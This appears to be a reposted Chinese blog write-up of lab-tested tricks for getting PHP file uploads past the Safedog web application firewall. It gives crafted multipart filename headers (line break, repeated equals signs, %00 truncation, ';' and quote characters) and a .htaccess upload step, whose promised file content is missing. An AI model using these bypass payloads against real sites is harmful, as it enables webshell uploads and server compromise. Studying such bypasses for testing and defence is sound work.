综述
文件上传实质上还是客户端的post请求,消息主题是一些上传信息。前端上传界面需要制定enctype为multipart/from-data 才能正常上传文件。
此处不讲各种中间件解析漏洞,只列举几种safe_dog对脚本文件上传拦截的绕过。
靶机环境:
win2003+safe_dog4.0.23957+webug中的上传
1、换行
1 |
Content-Disposition: form-data; name="file"; filename="1.p |
2、多个等号 (不止2,3个)
1 |
Content-Disposition: form-data; name="file"; filename=="2.php" |
1 |
Content-Disposition: form-data; name="file"; filename==="3.php" |
3、00截断
1 |
Content-Disposition: form-data; name="file"; filename="4.php%00" |
4、文件名+;号
1 |
Content-Disposition: form-data; name="file"; filename="6;.php" |
5、文件名+‘
1 |
Content-Disposition: form-data; name="file"; filename="7'.php" |
6、上传.htaccess
1 |
Content-Disposition: form-data; name="file"; filename=".htaccess" |
然后再去正常的上传一个jpg文件,内容写为
最后访问8.jpg 以php解析
7、参考:
https://www.t00ls.net/viewthread.php?tid=51253&highlight=%E5%AE%89%E5%85%A8%E7%8B%97
https://www.t00ls.net/viewthread.php?tid=50690&highlight=%E5%AE%89%E5%85%A8%E7%8B%97
转载自T9Sec Team
FROM :b0urne.top | Author:b0urne
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论